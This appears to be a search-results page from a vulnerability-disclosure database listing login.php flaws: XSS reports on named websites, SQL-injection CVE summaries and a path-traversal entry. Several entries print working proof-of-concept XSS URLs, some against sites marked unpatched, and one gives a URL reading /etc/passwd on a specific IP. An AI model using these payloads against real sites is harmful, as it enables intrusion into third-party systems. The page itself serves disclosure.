1445 matches found
thewizard.com XSS vulnerability
Vulnerable URL: http://thewizard.com/wiznet/inner-login.php?errmsg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 07.12.2015 Latest check for patch:| 07.12.2015 21:55 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...
roer.se XSS vulnerability
Vulnerable URL: http://roer.se/login.php?ged="';--=index.php?ctype=gedcom=preview Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP...
schedule.mcairaviation.com XSS vulnerability
Vulnerable URL: http://schedule.mcairaviation.com/login.php?msg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 21:46 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Ran...
subammarriage.com XSS vulnerability
Vulnerable URL: http://www.subammarriage.com/login.php?msg=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated...
myheritage.jp XSS vulnerability
Vulnerable URL: http://www.myheritage.jp/FP/Company/login.php?email=%27%22%3E%3E%3C/title%3E%27%22%3ESC%20RIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 18:47 GMT Vulnerability...
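iGENUS Mail System V5.0 arbitrary file read vulnerability
In login.php, after a language environment is selected, the language file is read and loaded into the page. When the backend receives the request, it reads the file directly without filtering the Lang parameter, which results in an arbitrary file read vulnerability. http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg...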
platorodiamante.com XSS vulnerability
Vulnerable URL: http://www.platorodiamante.com/login.php?Error= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:| No...
brannk.no XSS vulnerability
Vulnerable URL: https://www.brannk.no/views/frontpage/login.php?error= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 3 VIP website status...
epure.be XSS vulnerability
Vulnerable URL: http://www.epure.be/pm/security/login.php?Message=@CAPINVALIDSESSION@=" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 15520340 Google Pagerank| 0 VIP website...
CVE-2015-4658
CVE-2015-4658 is described across multiple sources as a SQL injection vulnerability in the Milw0rm Clone Script 1.0. The affected component is the admin/login.php script, with input fields (1) usr and (2) pwd used to construct SQL queries, enabling remote attackers to execute arbitrary SQL comman...
vestmarket.ro XSS vulnerability
Open Bug Bounty ID: OBB-65877 Description| Value ---|--- Affected Website:| vestmarket.ro Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat Shee...
CVE-2012-1665
Multiple SQL injection vulnerabilities in the admin panel in osCMax before 2.5.1 allow (1) remote attackers to execute arbitrary SQL commands via the username parameter in a process action to admin/login.php or (2) remote administrators to execute arbitrary SQL commands via the status parameter to...
CVE-2015-2679
Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php or (2) username parameter to gxadmin/login.php...
CVE-2014-10020
SQL injection vulnerability in login.php in Simple e-document 1.31 allows remote attackers to execute arbitrary SQL commands via the username parameter...
CVE-2014-10020
CVE-2014-10020 describes an SQL injection in login.php of Simple e-document 1.31, exploitable by remote attackers via the username parameter. The affected component is the login routine; the underlying cause is improper input handling allowing arbitrary SQL execution. The NVD data assigns a CVSS ...
CVE-2014-9519
SQL injection vulnerability in login.php in InfiniteWP Admin Panel before 2.4.3 allows remote attackers to execute arbitrary SQL commands via the email parameter...
SQL injection
SQL injection vulnerability in login.php in InfiniteWP Admin Panel before 2.4.3 allows remote attackers to execute arbitrary SQL commands via the email parameter...
FreeBSD : wordpress -- multiple vulnerabilities (5e135178-8aeb-11e4-801f-0022156e8794)
MITRE reports: wp-login.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 might allow remote attackers to reset passwords by leveraging access to an e-mail account that received a password-reset message. wp-includes/http.php in WordPress before 3.7.5,...
myinobas.de XSS vulnerability
Open Bug Bounty ID: OBB-53070 Description| Value ---|--- Affected Website:| myinobas.de Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Cheat Sheet...